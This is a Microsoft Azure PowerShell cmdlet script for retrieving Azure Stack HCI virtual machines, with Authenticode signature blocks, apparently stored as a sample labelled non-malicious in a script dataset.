YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQDq8xzVXwLguauAQj1rrJ4/TyEMm6CBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6WNodjAi # GA8yMDI0MDEzMDEyMjIxNFoYDzIwMjQwMTMxMTIyMjE0WjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDpY2h2AgEAMAcCAQACAh7cMAcCAQACAhKcMAoCBQDpZLn2AgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAHqVlO60+bLDOZLMjiF0hGzRla18 # cyWHnAHLChme6yYYOPMQeC4h95j1pADUYGZjeTxin1feBsQwF1qq4bK6sSEeI+h/ # frAsTIFhBlzJ2V2eyOTues5LDnKfDhbmDTARI5VZKCVASRvECwUWBYbod1mo2Qia # EELJWXS+SWSRuK1ievX3yxBEdUeWbfTxLh1vfw4gC4Z4fSquDBTYq0iQq4EKUjlV # WKORW19kaqJ+gI3Ig7e7mGhbhHUG3/37jvnsHb/ykmJyjl0EFZdL5DK14dXnTuWn # ku4B0mU5V+Fy5AWR4SAuU2YeHyusl/y0KnE7kUMkKwVIGtjydEp8SkuPmXQxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAc9S # Nr5xS81IygABAAABzzANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAXN22W6TzfWd0WiGoCVuISerYN # a2Ciy0ll+n/wJev01DCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EILPpsLqe # NS4NuYXE2VJlMuvQeWVA80ZDFhpOPjSzhPa/MIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHPUja+cUvNSMoAAQAAAc8wIgQgO5duz7Dv # U3UnNIht7l5FWnYplaOX5KmZpLwfWROLa3QwDQYJKoZIhvcNAQELBQAEggIAURqb # pzCqPFCO5eduFACC3aOuL8OofhJg1+hMlFad3z3DfrPvalKNFB6AUnCXzqxIN9jD # RILwTvnJYdsuzCD2QL9qdwCdy1u3k8UD/k7LsgWB5o7y2sjTWZ404WUvBVh1YCs+ # x59Xc9H4ViEoCjVwRqHAA+DvJfPUG9Zo6pQa3wpJ3XhE3vxgMab5IDJeaQgeeOnA # J5dySpVCc0I4juEYRz0cWXvV9RV4jDtWFb6B5znxGuMBHaE3Z6LP4zaP6dAz79WO # PKX+X5jMApx5ATl3q1ukLaJt4mIwXnroEdhOwWB+2ZwTOQ5zXcrVZBrcV2AV33zW # 4ZH9Kc71gudKuWeXhj9c+pH9UwEMTPtQAooghQTL9zg68vP6EcqJ9CxTPsXA6Iny # JwhhL/mL4B7zlFMaCJCoxavwW5tEcwO9tMyhPJkhEPNIQ9bS3D9la7RRoZBQMGi2 # 6srAjEhprZrL+nBj4n2OpY1EIwHvb7ulVsrm4CuOe9FWcxkfBA1dgbJ0fkKhLxZW # qqkXdIwlEdWrRZL6MkfhzIxeV39jSeWZxLeCQ5ZC8a1jc5g+SHzmZ8glLFZNJBG6 # WV/guM1CRcldOoN3xscimnYhZnA+NWzIJhml2z/l3PWHOmXpJBg7gklNixUyMzi2 # dfEwgx9h9jxV0ZB7gwAF+7NIzkykKvFK/9pnU3s= # SIG # End signature block
combined_dataset/train/non-malicious/sample_28_13.ps1
sample_28_13.ps1
# ---------------------------------------------------------------------------------- # # Copyright Microsoft Corporation # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------------- <# .Synopsis Gets a virtual machine .Description Gets a virtual machine .Outputs Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Models.IVirtualMachineInstance .Link https://learn.microsoft.com/powershell/module/az.stackhcivm/get-azstackhcivmvirtualmachine #> function Get-AzStackHCIVMVirtualMachine { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Models.Machine],ParameterSetName='ByResourceGroup' )] [OutputType([Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Models.IVirtualMachineInstance],ParameterSetName='ByName' )] [CmdletBinding( PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(ParameterSetName='ByName', Mandatory)] [Alias('VirtualMachineName')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Path')] [System.String] # Name of the virtual machine ${Name}, [Parameter(ParameterSetName='ByName', Mandatory)] [Parameter(ParameterSetName='ByResourceGroup', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByResourceGroup')] [Parameter(ParameterSetName='BySubscription')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='ByResourceId', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Path')] [System.String] # The ARM ID of the virtual machine. ${ResourceId}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Run the command asynchronously ${NoWait}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StackHCIVM.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { if ($PSCmdlet.ParameterSetName -eq "ByName" -or $PSCmdlet.ParameterSetName -eq "ByResourceId"){ if (($ResourceId -match $vmRegex) -or ($Name -and $ResourceGroupName -and $SubscriptionId)){ if ($ResourceId -match $vmRegex){ $SubscriptionId = $($Matches['subscriptionId']) $ResourceGroupName = $($Matches['resourceGroupName']) $Name = $($Matches['machineName']) } $resourceUri = "/subscriptions/" + $subscriptionId + "/resourceGroups/" + $ResourceGroupName + "/providers/Microsoft.HybridCompute/machines/" + $Name $PSBoundParameters.Add("ResourceUri", $resourceUri) $null = $PSBoundParameters.Remove("SubscriptionId") $null = $PSBoundParameters.Remove("ResourceGroupName") $null = $PSBoundParameters.Remove("ResourceId") $null = $PSBoundParameters.Remove("Name") return Az.StackHCIVM.internal\Get-AzStackHCIVMVirtualMachine @PSBoundParameters } else { Write-Error "One or more input parameters are invalid. Resource ID is: $ResourceId, name is $name, resource group name is $resourcegroupname, subscription id is $subscriptionid" } } elseif ($PSCmdlet.ParameterSetName -eq "ByResourceGroup") { $allHCIMachines = [System.Collections.ArrayList]::new() $machines = Az.StackHCIVM.internal\Get-AzStackHCIVMMachine -ResourceGroupName $ResourceGroupName -SubscriptionId $SubscriptionId foreach ($machine in $machines){ if ($machine.Kind.ToString() -eq "HCI"){ [void]$allHCIMachines.Add($machine) } } return $allHCIMachines } else { $allHCIMachines = [System.Collections.ArrayList]::new() $machines = Az.StackHCIVM.internal\Get-AzStackHCIVMMachine -SubscriptionId $SubscriptionId foreach ($machine in $machines){ if ($machine.Kind.ToString() -eq "HCI"){ [void]$allHCIMachines.Add($machine) } } return $allHCIMachines } } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDw71mNd637kr+l # W5ZmMDzQuqBdbWo2eRyH0Dqtsl2SSqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEINFhCYvsELMfE2/2QibRqSvx # TnidTlJ7o4V0YVyZ94FEMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEArOHHm3BgxveECVoYErRb8L+TKZn/JHInBNOuvCruhWUVzLgq0LuFrFYE # R1hbkSLjaEf4dj3EeJZIcHLVqEYt6JXua4nyncwJuU6R2WyriIxO3OfEDc8ScUB8 # k/5ti5om8P0TR/5YJE9uthUGaYDmizNueL1OMkLCi1tmnjGVti6nWTc7AI76dFtn # azsOnaLGu5sei4bAWNa5AG/z/ArV+UsSP4gstF3ZAc/WGDRwnQ4uyrW0uNVafFtb # fk2rYLQ8bUQOfBiFilNzbwR0Ds2cN+4jHUQVObBLv58qIeWQw5Sk43JgYhU/5D7w # uNfNvFCZpfcKbZLYy7Z/6HCH+8runaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDIfWl9YQbtA3pWY4+rmNbkP64OW2P3jxoFpc9nI2YVlAIGZjOrDSKa # GBMyMDI0MDUxNjA2NDIxMy44MDFaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjE3OUUtNEJCMC04MjQ2MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHg1PwfExUffl0AAQAAAeAwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzE5WhcNMjUwMTEwMTkwNzE5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoxNzlFLTRC # QjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKyHnPOhxbvRATnGjb/6fuBh # h3ZLzotAxAgdLaZ/zkRFUdeSKzyNt3tqorMK7GDvcXdKs+qIMUbvenlH+w53ssPa # 6rYP760ZuFrABrfserf0kFayNXVzwT7jarJOEjnFMBp+yi+uwQ2TnJuxczceG5FD # HrII6sF6F879lP6ydY0BBZkZ9t39e/svNRieA5gUnv/YcM/bIMY/QYmd9F0B+ebF # Yi+PH4AkXahNkFgK85OIaRrDGvhnxOa/5zGL7Oiii7+J9/QHkdJGlfnRfbQ3QXM/ # 5/umBOKG4JoFY1niZ5RVH5PT0+uCjwcqhTbnvUtfK+N+yB2b9rEZvp2Tv4ZwYzEd # 9A9VsYMuZiCSbaFMk77LwVbklpnw4aHWJXJkEYmJvxRbcThE8FQyOoVkSuKc5OWZ # 2+WM/j50oblA0tCU53AauvUOZRoQBh89nHK+m5pOXKXdYMJ+ceuLYF8h5y/cXLQM # OmqLJz5l7MLqGwU0zHV+MEO8L1Fo2zEEQ4iL4BX8YknKXonHGQacSCaLZot2kyJV # RsFSxn0PlPvHVp0YdsCMzdeiw9jAZ7K9s1WxsZGEBrK/obipX6uxjEpyUA9mbVPl # jlb3R4MWI0E2xI/NM6F4Ac8Ceax3YWLT+aWCZeqiIMLxyyWZg+i1KY8ZEzMeNTKC # EI5wF1wxqr6T1/MQo+8tAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUcF4XP26dV+8S # usoA1XXQ2TDSmdIwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # 